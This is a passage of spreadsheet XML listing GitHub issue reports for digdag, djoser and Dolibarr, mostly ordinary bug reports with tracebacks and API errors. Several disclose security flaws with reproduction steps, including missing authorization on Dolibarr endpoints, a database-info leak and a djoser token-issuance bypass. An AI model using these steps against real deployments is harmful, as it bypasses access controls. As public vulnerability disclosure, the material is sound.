    <t>Right now, a user of digdag could be confused by creating &amp; pushing a workflow to the server that is not longer in spec. The server mode should check the versions are not the same and when it doesn't do the following: 1. Not accept the workflow submission 2. Provide a note to the user to update the client. This note should include the following: - user should run "digdag selfupdate" - user should try re-running workflow to ensure compatibility with new version - then re-submit to the server mode</t>
  </si>
  <si>
    <t>https://github.com/treasure-data/digdag/issues/65</t>
  </si>
  <si>
    <t>Fail when '_' is not used as a prefix as required for certain parameters</t>
  </si>
  <si>
    <t>When a user tries using a parameter that requires a '_' at as a prefix, but doesn't include it, it should fail and mentioned the the '_' is required. For example, if a user doesn't include the '_' as a prefix in '_parallel', then the workflow is executed sequentially, but it's not necessarily obvious that it's not operating as the user expected.</t>
  </si>
  <si>
    <t>https://github.com/treasure-data/digdag/issues/658</t>
  </si>
  <si>
    <t>digdag-ui can't show task log when use of HTTP Basic Authentication</t>
  </si>
  <si>
    <t>Hi. digdag-ui can't show task log when connected through a proxy server. Using Nginx and restricting access with HTTP Basic Authentication. In that situation, we always get a `401 (Unauthorized)` Error. See below. (Left: Normal, Right: Through Proxy) ![2017-10-02 21 04 39](https://user-images.githubusercontent.com/4961885/31076499-5ada6272-a7b5-11e7-9b88-6bedb734ef64.png)</t>
  </si>
  <si>
    <t>https://github.com/sunscrapers/djoser/issues/5</t>
  </si>
  <si>
    <t>AssertionError at /auth/logout</t>
  </si>
  <si>
    <t xml:space="preserve"> AssertionError at /auth/logout 'LogoutView' should either include a 'serializer_class' attribute, or use the 'model' attribute as a shortcut for automatically generating a serializer class.  i think this is due to a change in DRF. Here are my versions:  Django==1.6.8 djoser==0.1.0 djangorestframework==2.4.4  Pull request with a fix incoming</t>
  </si>
  <si>
    <t>https://github.com/sunscrapers/djoser/issues/42</t>
  </si>
  <si>
    <t>Username is not validated properly for `set_username` endpoint</t>
  </si>
  <si>
    <t>To be precise the issue is caused by function called `create_username_field()`. It creates the serializer field but it doesn't add the validators to this field instance. It just doesn't take into account the parameters passed to username model field.</t>
  </si>
  <si>
    <t>https://github.com/sunscrapers/djoser/issues/120</t>
  </si>
  <si>
    <t>Activation token invalidated by user login</t>
  </si>
  <si>
    <t>Hello, thanks for the great work on this library! `ActivationView` uses Django's `PasswordResetTokenGenerator` to generate the activation token. To create this token, this class hashes internal user state, including the user's last login time. This means if the user logs in before clicking the activation link (in situations where the activation link is sent, but the user is not required to click it before logging in), the token is invalidated and will not work. The API returns a 400 with `INVALID_TOKEN_ERROR`. This token hashing behavior makes sense for password reset tokens, however when creating activation tokens we should not hash the user's last login. This will allow djoser to support optional activation/confirmation links. What are your thoughts on this? Would you be willing to accept a pull request?</t>
  </si>
  <si>
    <t>https://github.com/sunscrapers/djoser/issues/190</t>
  </si>
  <si>
    <t>Race condition in case of near simultaneous POST API calls</t>
  </si>
  <si>
    <t>Some of Djoser views are vulnerable to a race condition (which is not really a security issue unless you've setup debug in production). Basically saying, the problem is that in case of near simultaneous requests to endpoint with a POST method, which creates object for a model with a field with unique constraint, it will result in an `IntegrityError` and will return 500 to the client. It happens because of mentioned race condition, where validation step passes for both requests and than it fails on transaction to database.</t>
  </si>
  <si>
    <t>https://github.com/sunscrapers/djoser/issues/323</t>
  </si>
  <si>
    <t>UserView' should either include a `queryset` attribute</t>
  </si>
  <si>
    <t xml:space="preserve"> Request Method: | GET -- | -- http://127.0.0.1:8000/api/v1/auth/me 2.1.3 AssertionError 'UserView' should either include a `queryset` attribute, or override the `get_queryset()` method. C:\Python37\lib\site-packages\rest_framework\generics.py in get_queryset, line 68 C:\Python37\python.exe  Related commit https://github.com/encode/django-rest-framework/commit/b3253b42836acd123224e88c0927f1ee6a031d94</t>
  </si>
  <si>
    <t>https://github.com/sunscrapers/djoser/issues/327</t>
  </si>
  <si>
    <t>403 error on user requests</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to Reproduce: 1. Sign into a non-administrative user 2. Attempt to retrieve another user from `GET /auth/users/:userid/`  Expected results: The user is sent back.  Actual results: 403 error. This was broken by https://github.com/sunscrapers/djoser/commit/0d36af98ac26691678ac11b91d4b04c2e0e59a69. It completely restricts access to other users, rather than limiting it to read-only.</t>
  </si>
  <si>
    <t>https://github.com/sunscrapers/djoser/issues/374</t>
  </si>
  <si>
    <t>Documentation Issue - jwt verification endpoint</t>
  </si>
  <si>
    <t>The /auth/jwt/verify endpoint throws a 401 unauthorised error, and not a 400. &lt;img width="1166" alt="Screenshot 2019-05-02 at 16 52 06" src="https://user-images.githubusercontent.com/23339706/57088747-daccf600-6cfa-11e9-9809-7b4fd9279bc6.png"&gt;</t>
  </si>
  <si>
    <t>https://github.com/sunscrapers/djoser/issues/413</t>
  </si>
  <si>
    <t>AttributeError at /api/auth/users/</t>
  </si>
  <si>
    <t xml:space="preserve">I tried to create a new user by running a POST request to `/api/auth/users/`. User created and email sended, but with error:  Got AttributeError when attempting to get a value for field `re_password` on serializer `UserCreatePasswordRetypeSerializer`. The serializer field might be named incorrectly and not match any attribute or key on the `User` instance. Original exception text was: 'User' object has no attribute 're_password'.   Environment: Request Method: POST Request URL: http://api.localhost/api/auth/users/ Django Version: 2.2.3 Python Version: 3.7.3 Installed Applications: ['corsheaders', 'django_filters', 'mptt', 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'django.contrib.sites', 'rest_framework', 'rest_framework.authtoken', 'djoser', 'debug_toolbar'] Installed Middleware: ['debug_toolbar.middleware.DebugToolbarMiddleware', 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'corsheaders.middleware.CorsMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'django_currentuser.middleware.ThreadLocalUserMiddleware'] Traceback: File "/usr/local/lib/python3.7/site-packages/rest_framework/fields.py" in get_attribute 443. return get_attribute(instance, self.source_attrs) File "/usr/local/lib/python3.7/site-packages/rest_framework/fields.py" in get_attribute 93. instance = getattr(instance, attr) During handling of the above exception ('User' object has no attribute 're_password'), another exception occurred: File "/usr/local/lib/python3.7/site-packages/django/core/handlers/exception.py" in inner 34. response = get_response(request) File "/usr/local/lib/python3.7/site-packages/django/core/handlers/base.py" in _get_response 115. response = self.process_exception_by_middleware(e, request) File "/usr/local/lib/python3.7/site-packages/django/core/handlers/base.py" in _get_response 113. response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/usr/local/lib/python3.7/site-packages/django/views/decorators/csrf.py" in wrapped_view 54. return view_func(*args, **kwargs) File "/usr/local/lib/python3.7/site-packages/rest_framework/viewsets.py" in view 114. return self.dispatch(request, *args, **kwargs) File "/usr/local/lib/python3.7/site-packages/rest_framework/views.py" in dispatch 497. response = self.handle_exception(exc) File "/usr/local/lib/python3.7/site-packages/rest_framework/views.py" in handle_exception 457. self.raise_uncaught_exception(exc) File "/usr/local/lib/python3.7/site-packages/rest_framework/views.py" in raise_uncaught_exception 468. raise exc File "/usr/local/lib/python3.7/site-packages/rest_framework/views.py" in dispatch 494. response = handler(request, *args, **kwargs) File "/usr/local/lib/python3.7/site-packages/rest_framework/mixins.py" in create 20. headers = self.get_success_headers(serializer.data) File "/usr/local/lib/python3.7/site-packages/rest_framework/serializers.py" in data 559. ret = super().data File "/usr/local/lib/python3.7/site-packages/rest_framework/serializers.py" in data 261. self._data = self.to_representation(self.instance) File "/usr/local/lib/python3.7/site-packages/rest_framework/serializers.py" in to_representation 513. attribute = field.get_attribute(instance) File "/usr/local/lib/python3.7/site-packages/rest_framework/fields.py" in get_attribute 476. raise type(exc)(msg) Exception Type: AttributeError at /api/auth/users/ Exception Value: Got AttributeError when attempting to get a value for field `re_password` on serializer `UserCreatePasswordRetypeSerializer`. The serializer field might be named incorrectly and not match any attribute or key on the `User` instance. Original exception text was: 'User' object has no attribute 're_password'.  settings.py python DJOSER = { 'ACTIVATION_URL': '#/activate/{uid}/{token}', 'PASSWORD_RESET_CONFIRM_RETYPE': True, 'PASSWORD_RESET_CONFIRM_URL': '#/password/reset/confirm/{uid}/{token}', 'SEND_ACTIVATION_EMAIL': True, 'SEND_CONFIRMATION_EMAIL': True, 'USER_CREATE_PASSWORD_RETYPE': True, }  User Model python class User(AbstractUser): USERNAME_FIELD = 'email' REQUIRED_FIELDS = [] username = None email = models.EmailField('Email', unique=True) company = models.ForeignKey(Company, on_delete=models.CASCADE, null=True, blank=True) objects = IMSUserManager()  UserManager, rewrite without username python class IMSUserManager(BaseUserManager): use_in_migrations = True def _create_user(self, email, password, **extra_fields):  Create and save a user with the given username, email, and password.  if not email: raise ValueError('The given email must be set') email = self.normalize_email(email) user = self.model(email=email, **extra_fields) user.set_password(password) user.save(using=self._db) return user def create_user(self, email=None, password=None, **extra_fields): extra_fields.setdefault('is_staff', False) extra_fields.setdefault('is_superuser', False) return self._create_user(email, password, **extra_fields) def create_superuser(self, email, password, **extra_fields): extra_fields.setdefault('is_staff', True) extra_fields.setdefault('is_superuser', True) if extra_fields.get('is_staff') is not True: raise ValueError('Superuser must have is_staff=True.') if extra_fields.get('is_superuser') is not True: raise ValueError('Superuser must have is_superuser=True.') return self._create_user(email, password, **extra_fields) </t>
  </si>
  <si>
    <t>https://github.com/sunscrapers/djoser/issues/417</t>
  </si>
  <si>
    <t>user "delete" permissions and serializer settings not respected</t>
  </si>
  <si>
    <t>The permission_class setting for "user_delete" is not respected as `UserViewSet.get_permissions` doesn't check for action `delete` or (`me` with method `DELETE`). Instead, it just uses the default class permission. Also the `UserViewSet.get_serializer_class` doesn't work for `user_delete` as the action that is checked is `remove` while the real action should be `delete`. This serializer setting is important as out-of-the-box it requires the user's password before deleting.</t>
  </si>
  <si>
    <t>https://github.com/sunscrapers/djoser/issues/430</t>
  </si>
  <si>
    <t>User activation logic does not follow docs</t>
  </si>
  <si>
    <t>According to [the docs](https://djoser.readthedocs.io/en/latest/settings.html#send-activation-email), a user is "required to click activation link sent in email" after updating their email. This is not happening and further research into the code reveals this different logic: https://github.com/sunscrapers/djoser/blob/c5a6f85efb55bc569529c45d98d3992f7ff7fc8b/djoser/views.py#L152 Could you please either patch this or update the docs?</t>
  </si>
  <si>
    <t>https://github.com/sunscrapers/djoser/issues/795</t>
  </si>
  <si>
    <t>DJOSER is giving tokens to users that don't pass the AUTHENTICATION_BACKENDS.authenticate</t>
  </si>
  <si>
    <t>https://github.com/sunscrapers/djoser/blob/4452009f628b59f02704373d5e7f991f1243397f/djoser/serializers.py#L127 When retrieving a token DJOSER check itself if the password match, or not. If password match, only active or not validation is done. Django authentication backends propose a set of method to do authentication centralised by backend, while respecting the configuration order (first login accepted first groups and permissions given to the user). django.contrib.auth.authenticate is used in AUTHENTICATION_BACKENDShttps://github.com/sunscrapers/djoser/blob/4452009f628b59f02704373d5e7f991f1243397f/djoser/serializers.py#L122. This function call, in the order declared in AUTHENTICATION_BACKENDS, the authenticate method for each backend. After checking if the login is correct in all authentication backends, if one user without any permission to get token has a user -password that match, DJOSE give the token. DJOSER should accept the result of authenticate because developpers can add more condition in the backends to allow user be authenticated.</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/23179</t>
  </si>
  <si>
    <t>Bug: Products REST API don't update the Notes (Private and Public) Property</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug The /products/{id} REST Call is not Updateing the Notes.  Environment Version 17 beta  Environment OS _No response_  Environment Web server _No response_  Environment PHP _No response_  Environment Database _No response_  Environment URL(s) _No response_  Expected and actual behavior _No response_  Steps to reproduce the behavior ![image](https://user-images.githubusercontent.com/78662388/206912078-d69691ac-639a-4838-b782-23442458c811.png) See in the "Response Body": "note_public": "note_private": the old values are avalible.  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/23248</t>
  </si>
  <si>
    <t>Prices not updated when external user (client) create a propal or command</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug I just found (and hope to have resolved) a quite tricky bug: In one of my projects, we allow some clients to connect to Dolibarr to create themselves their commands They can add lines to the command, but if they choose a predefined product or service, its price is not copied in #price_ht input A dive in the code shows that /core/tpl/objectline_create.tpl.php make an ajax call to /product/ajax/products.php In this file line ~68 (65 in dev branch) `restrictedArea($user, 'produit|service', 0, 'product&amp;product');` doesnt allow access to external users, and the ajax call throw an error which in not logged :-\ (because of line ~320 `if (!empty($user-&gt;socid) &amp;&amp; !empty($conf-&gt;global-&gt;MAIN_MODULES_FOR_EXTERNAL) &amp;&amp; !in_array($featureforlistofmodule, $listofmodules)) { // If limits on modules for external users, module must be into list of modules for external users` in /core/lib/security.lib.php) I suggest after tests to change line ~68 in /product/ajax/products.php to `restrictedArea($user, 'produit|service|commande|propal', 0, 'product&amp;product');`  Environment Version All including dev  Environment OS _No response_  Environment Web server _No response_  Environment PHP _No response_  Environment Database _No response_  Environment URL(s) _No response_  Expected and actual behavior _No response_  Steps to reproduce the behavior _No response_  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/23345</t>
  </si>
  <si>
    <t>[API] - Get shipment return DB informations</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug The call {{host}}/api/index.php/shipments?sortfield=t.rowid&amp;sortorder=ASC&amp;limit=100 responds each line with Db information !! This is a security issue!! The respond contains   "lines": [ { "origin_line_id": "2719", "fk_origin_line": "2719", "fk_expedition": "638", "qty": "1", "qty_shipped": "1", "fk_product": "127", "detail_batch": [  "db": { "db": {  }, "type": "mysqli",   Environment Version 16.0.3  Environment OS Debian  Environment Web server Apache/2.4.38 (Debian)  Environment PHP 7.3.31-1~deb10u2  Environment Database MariaDB 5.5.5-10.3.36-MariaDB-0+deb10u2  Environment URL(s) /api/index.php/shipments  Expected and actual behavior _No response_  Steps to reproduce the behavior curl -X GET --header 'Accept: application/json' --header 'DOLAPIKEY: {passkey}' '{host}/api/index.php/shipments/{id}' where id is a shipment which include product with a serial number  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/23415</t>
  </si>
  <si>
    <t>REST BOM API - It's able to have a wrong value on the 'ref' Field</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug It's able to have a wrong value on the 'ref' Field by adding or updating a BOM.  Environment Version 18  Environment OS _No response_  Environment Web server _No response_  Environment PHP PHP 8.1.10  Environment Database _No response_  Environment URL(s) _No response_  Expected and actual behavior **Actual behavior / Problems:** - **If you update a BOM with the API you can change the the status from DRAFT to a other Status, with the same ref e.g. '(PROV54)'** - Currently the 'ref' Field is required. So you can not use the Dolibarr NextNum Generator. **Expected behavior** - If no 'ref' is set on create and the status is 0 (DRAFT) then create a ref '(PROF)'. - If no 'ref' is set on create and the status is grater then &gt; 0, then create a 'ref' with number generator. - If 'ref' is set, use the value from the REST-Call.  Steps to reproduce the behavior _No response_  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/23790</t>
  </si>
  <si>
    <t>Bug: REST API "/mos/{id}/produceandconsume" not possible to consume specific MoLines</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug The implementation doest correspond the function in Dolibarr. i need feedback if i should revise the function.  Environment Version 17  Environment OS _No response_  Environment Web server _No response_  Environment PHP _No response_  Environment Database _No response_  Environment URL(s) _No response_  Expected and actual behavior **Expected behavior:** Like the same behavior with the API as in the Dolibarr UI: ![image](https://user-images.githubusercontent.com/78662388/216821734-096cc624-f9c7-432a-958b-f3a52d58aba3.png) _REST Call:_  { "inventorylabel": "Production of MO2301-0005", "inventorycode": "20230205140301", "autoclose": 1, "arraytoconsume": [{"objectId": 253, "qty": 2, "fk_warehouse": 1}], "arraytoproduce": [] }  **Actual behavior:** The REST Call returns a "Internal Server Error". Problems: 1. Only if no value in arraytoconsume and arraytoproduce the API make a "automatic" consum and produce over all MoLines. Its crashing if the Stockvalue is lower then the expected qty in the MoLine. 2. The "objectId" is linked to fk_product. This is wrong we need a link to the MoLine. 3. If you set a value in arraytoconsume or arraytoproduce then the API function try to generate a new MoLine. The current implementation of the API function make not "produce and consume".  Steps to reproduce the behavior _No response_  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/24661</t>
  </si>
  <si>
    <t>Start and end date of contract lines not available in API anymore</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug In version 17 the contract start and end dates of contract lines are not exposed in the API anymore but are [cleaned before](https://github.com/Dolibarr/dolibarr/blob/b1e62d729754b94d8a50a83f1903ef3197a061e7/htdocs/contrat/class/api_contracts.class.php#L664).  Environment Version 17.0.1  Environment OS _No response_  Environment Web server _No response_  Environment PHP _No response_  Environment Database _No response_  Environment URL(s) /api/index.php/contracts/93  Expected and actual behavior Until version 16, start and end dates of individual contract lines were included in the API response in the fields `date_start`, `date_start_real`, `date_end` and `date_end_real`. This was apparently changed in d597eb8 when the legacy field names were permanently removed. I would expect that the dates continue to be sent in the API as they are not particularly sensitive.  Steps to reproduce the behavior _No response_  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/24780</t>
  </si>
  <si>
    <t>500 Error - Serialization error during update of custom field</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug When I attempt to update a custom field from the facture card, I have a unhandled 500 error. I just updated : - dolibarr from 16.0.4 to 17.0.1 - ubuntu 20.04 to 22.04 - php from 7.4 to 8.1 - pgsql from 12.x to 14.7) This custom field is a simple boolean and was working before the bunch of update. Here is the apache log.  [Mon May 15 21:54:34.209985 2023] [php:error] [pid 5655] [client 12.34.56.78:50449] PHP Fatal error: Uncaught Exception: Serialization of 'PgSql\\Connection' is not allowed in /opt/dolibarr/htdocs/core/lib/functions.lib.php:1167\nStack trace:\n#0 /opt/dolibarr/htdocs/core/lib/functions.lib.php(1167): serialize()\n#1 /opt/dolibarr/htdocs/compta/facture/card.php(2875): dol_clone()\n#2 {main}\n thrown in /opt/dolibarr/htdocs/core/lib/functions.lib.php on line 1167, referer: https://myowidolibarr.ca/compta/facture/card.php?id=61&amp;action=edit_extras&amp;token=hiddentoken&amp;attribute=quickbooks&amp;ignorecollapsesetup=1   Environment Version 17.0.1  Environment OS Ubuntu 22.04 LTS  Environment Web server Apache 2.4  Environment PHP php 8.1.2  Environment Database postgresql 14.7  Environment URL(s) /compta/facture/card.php  Expected and actual behavior **Expected behaviour:** Just refresh the page with updated custom field (box checked in my case) **Actual behaviour:** After submit the update of the single custom field, I see the 500 error on my browser.  Steps to reproduce the behavior Pre-requisite: have a (boolean) custom field on invoice card. Create an invoice without filling the custom field. once created (and validated), click the pen near the custom field to enable input, update the custom field and click Update &lt;- and showtime  Attached files Concern my "quickbooks" field &lt;img width="694" alt="image" src="https://github.com/Dolibarr/dolibarr/assets/1232923/ed62bed1-d20e-48a8-b53c-0d03f57017bd"&gt; &lt;img width="1475" alt="image" src="https://github.com/Dolibarr/dolibarr/assets/1232923/bdd21b75-8db6-4dfb-a482-b6e61a4d16f9"&gt;</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/25929</t>
  </si>
  <si>
    <t>error on api_proposals.class.php</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug if call to endpoint /api/index.php/proposals/xxxxx/lines without sql filter this generate an exception The line 319 of file htdocs/comm/propal/class/api_proposals.class.php say: $this-&gt;propal-&gt;getLinesArray($sql); and $sql is not set this line would set into if at line 311 if (!empty($sqlfilters)) {  Environment Version 18.0.1  Environment OS Ubuntu 22.04  Environment Web server Nginx  Environment PHP 8.2  Environment Database mariadb 10  Environment URL(s) _No response_  Expected and actual behavior 2023/09/15 13:02:57 [error] 704889#704889: *47475930 FastCGI sent in stderr: "PHP message: PHP Warning: Undefined variable $sql in /xxxxx/htdocs/comm/propal/class/api_proposals.class.php on line 319" while reading response header from upstream, client: xxx.xxx.xxx.xx, server: xxxxxxxt, request: "GET /api/index.php/proposals/nnnnn/lines HTTP/1.1", upstream: "fastcgi://unix:/run/php/php8.2-fpm.sock:", host: "xxxxxxx"  Steps to reproduce the behavior curl -X GET --header 'Accept: application/json' --header 'DOLAPIKEY: xxxxxx' 'https://xxxxxxx/api/index.php/proposals/nnnnnn/lines'  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/26066</t>
  </si>
  <si>
    <t>No autorisation control on GET /multicurrencies through API</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug No autorisation control on GET /multicurrencies through API, where as GET /multicurrencies/bycode/{code} has autorisation control.  Environment Version 18.0.1  Environment OS upshift dolibarr docker image 18.0.1  Environment Web server upshift dolibarr docker image 18.0.1  Environment PHP PHP 8.2.10 (cli) (built: Aug 31 2023 20:34:52) (NTS)  Environment Database 1:11.0.3+maria~ubu2204  Environment URL(s) /api/index.php/multicurrencies?sortfield=t.rowid&amp;sortorder=ASC&amp;limit=100  Expected and actual behavior Expected rejection given that my API key is from a user that only has 3 permissions: 1. read access to products 2. read access to services 3. read access to tags and categories but no, the actual behaviour was that if I just asked for all currencies, then I got the data, where as if I only asked for the EUR currency, then I get `"message": "Unauthorized: Insufficient rights to read currency"`  Steps to reproduce the behavior enable modules: products, categories and multicurrency. Setup DKK and Eur currencies.  Attached files ![get_all_currencies](https://github.com/Dolibarr/dolibarr/assets/2551481/d3b6e500-f765-48fa-9cf2-ff6b0780aa46) ![get_EUR_currency](https://github.com/Dolibarr/dolibarr/assets/2551481/e9c3b409-4ed6-4c7a-9b47-b421e502cc7c)</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/26283</t>
  </si>
  <si>
    <t>Contract list services filter error with "expired service"</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug ![image](https://github.com/Dolibarr/dolibarr/assets/1215488/ca6f14f2-5b1f-40b3-858b-3142b99a5e4b) With filter EXPIRED, in list we see also "NOT EXPIRED". I suppose that sql query is not correct.  Environment Version Dolibarr &gt;= 18.x  Environment OS all version  Environment Web server all version  Environment PHP all version  Environment Database all version  Environment URL(s) /contrat/services_list.php?leftmenu=contracts&amp;search_status=4&amp;filter=expired  Expected and actual behavior Do not show "not expired" services.  Steps to reproduce the behavior Click on top menu "COMMERCIAL" Click on left menu "Expired Services"  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/26307</t>
  </si>
  <si>
    <t>Undefined property: Contact::$gender</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug When I was trying to create a user from a contact in the Rest API, I was getting a 500 error. I analyzed the error and it turns out that with PHP 8.1 you must have variables declared, so I went to contact.class.php and declared the variable and I can now create users without problem. /** * @var string gender */ public $gender = '';  Environment Version 17  Environment OS Linux  Environment Web server Apache  Environment PHP 8.1  Environment Database MySQL  Environment URL(s) _No response_  Expected and actual behavior _No response_  Steps to reproduce the behavior Create a contact from the API and then create your user  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/26881</t>
  </si>
  <si>
    <t>REST API thirparties setlevelprice fix</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug problem : the API thirparties setlevelprice does not work solution : in file api_thirdparties.class.php correct L562 from ` * @url PUT {id}/setpricelevel` to ` * @url PUT {id}/setpricelevel/{priceLevel}` to fix the API  Environment Version 18.0.3  Environment OS _No response_  Environment Web server _No response_  Environment PHP _No response_  Environment Database _No response_  Environment URL(s) _No response_  Expected and actual behavior _No response_  Steps to reproduce the behavior _No response_  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/27173</t>
  </si>
  <si>
    <t>Blank page when creating event (action) with a missing required extra field</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug If one adds a required extra field to events, then tries to create an event forgetting this field, instead of seeing the pre-filled form they get a blank page.  Environment Version 17.0.2, 17.0.3 probably all above  Environment OS Debian 11  Environment Web server Apache/2.4.56 (Debian)  Environment PHP 7.4.33  Environment Database 11.1.2-MariaDB  Environment URL(s) comm/action/card.php  Expected and actual behavior ## Expected I should see the erroneous form so I can easily complete and resubmit it ## Actual Blank page with an error message alerting me about the missing field  Steps to reproduce the behavior 1. Add a required extra field to events 2. Create an event omitting to complete this field 3. Blank page  Attached files The following patch fixes the issue (PR will follow) patch diff --git a/htdocs/comm/action/card.php b/htdocs/comm/action/card.php index dab70304d08..7eb5b68db9a 100644  a/htdocs/comm/action/card.php  b/htdocs/comm/action/card.php @@ -419,7 +419,8 @@ if (empty($reshook) &amp;&amp; $action == 'add') { // Fill array 'array_options' with data from add form $ret = $extrafields-&gt;setOptionalsFromPost(null, $object); if ($ret &lt; 0) { - $error++; + $error++;$donotclearsession = 1; + $action = 'create'; } </t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/29115</t>
  </si>
  <si>
    <t>API PUT call issue (product extra fields)</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug Unexpected behavior of PUT method upon updating product's extra fields  Dolibarr Version 19.0.1  Environment PHP 8.1.27  Environment Database MariaDB 10.6.17-MariaDB-cll-lve  Steps to reproduce the behavior and expected behavior Trying to call a product update through PUT method to update an extra field of the product: 1. Extrafield (checkbox) underlined: API must uncheck the box ![image](https://github.com/Dolibarr/dolibarr/assets/21037425/1875d81d-321c-48c3-b40d-cbd43c45230a) 2. API request body: ![image](https://github.com/Dolibarr/dolibarr/assets/21037425/ea436e65-20b3-492a-98c0-f7e5b7ac5c79) 3. After the call checkbox is unchecked which is right, however, previously set values for extra fields are now gone. NOTE: some of the extra fields didn't lose their values and it seems that those fields having _default value_ defined in extrafield settings don't lose the values, in fact, they **change** to default value from settings, regardless of what was set before or defined in API schema. ![image](https://github.com/Dolibarr/dolibarr/assets/21037425/d0341db0-3d4a-4468-9dbd-863b0b7fd67e) Obviously, standard fields are not affected, they're not changing (unless defined in schema) or loosing the values.  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/29292</t>
  </si>
  <si>
    <t>The colon char is breaking sqlfilters search</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug If you try :  http://my-dolibarr.local/api/index.php/orders?sortfield=t.rowid&amp;sortorder=ASC&amp;limit=100&amp;sqlfilters=t.ref_client%3A%3D%3A'a%3Ab'  With sqlfilters which is `t.ref_client:=:'a:b'`, the `:` make everything breaks. With this filter, it find order with those client ref: "LAvionJaune", "test", "htrh", "Mathis55109". I don't understand why or how it works, but it's very strange.  Dolibarr Version 18.0.5  Environment PHP 8.1.27  Environment Database MariaDB 10.11.6  Steps to reproduce the behavior and expected behavior Call API with this : `api/index.php/orders?sortfield=t.rowid&amp;sortorder=ASC&amp;limit=100&amp;sqlfilters=t.ref_client%3A%3D%3A'a%3Ab'`, in general with a `:` in the ref client  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/29372</t>
  </si>
  <si>
    <t>HRM : User have access to monthly statement without permission</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug Even if a user doesn't have the right to read all leave requests [1], the user can still access them by using the associated URI that goes to the monthly statement. I can handle the PR if you'd like :) [1] : ![image](https://github.com/Dolibarr/dolibarr/assets/57806687/4bec1157-1632-4a16-a3d2-62098884e22c) [2] ![image](https://github.com/Dolibarr/dolibarr/assets/57806687/87f0e8d8-fada-4d8a-a497-4d486a7f7473)  Dolibarr Version 19.0.1  Environment PHP 8.1  Environment Database MariaDB  Steps to reproduce the behavior and expected behavior Create a user that has no access except "read leaves request" Log with this account and access to the URI : https://yourdomain.com/holiday/month_report.php?mainmenu=hrm&amp;leftmenu=holiday  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/29421</t>
  </si>
  <si>
    <t>BUG: API GET /members/types/{id} says it deletes member type</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug BUG: API GET /members/types/{id} says it deletes member type { "success": { "code": 200, "message": "Member type deleted" } } but GET should never do that, only DELETE  Dolibarr Version 20.0.0-alpha  Environment PHP 8.2.7  Environment Database 10.11.7-MariaDB-1:10.11.7+maria~ubu2204  Steps to reproduce the behavior and expected behavior enable API module, create API key for user, visit the API explorer, scroll down and find GET /members/types/{id}, fill in a number, any number, even 89327434 and it says { "success": { "code": 200, "message": "Member type deleted" } }  Attached files ![get_member_types_says_delete_membeR_types](https://github.com/Dolibarr/dolibarr/assets/2551481/0cb13c2d-7408-4a73-a7a4-4c45c77f9b64)</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/29424</t>
  </si>
  <si>
    <t>BUG: in API GET member categories</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug If you in dolibarr version 20-alpha tries to use the API to get member categories it does not respect when you supply a non existing member id, where as in version 18.0.5 it does respect and gives an error.  Dolibarr Version 20.0.0-alpha  Environment PHP 8.2.7  Environment Database 10.11.7-MariaDB-1:10.11.7+maria~ubu2204  Steps to reproduce the behavior and expected behavior create some member categories and assign some members to them. use the API to get the member categories for a non existing member expected is an error better than the one in 18.0.5, because in 18.0.5 it says that the category does not exist, but it is the member that does not exist.  Attached files v20 ignores non existing members ![get_member_categories_v20_ignores_nonexisting_member](https://github.com/Dolibarr/dolibarr/assets/2551481/5a054bc6-4608-47c9-8ad1-6d83b1033e82)</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/29439</t>
  </si>
  <si>
    <t>API GET /documents doesn't return all information</t>
  </si>
  <si>
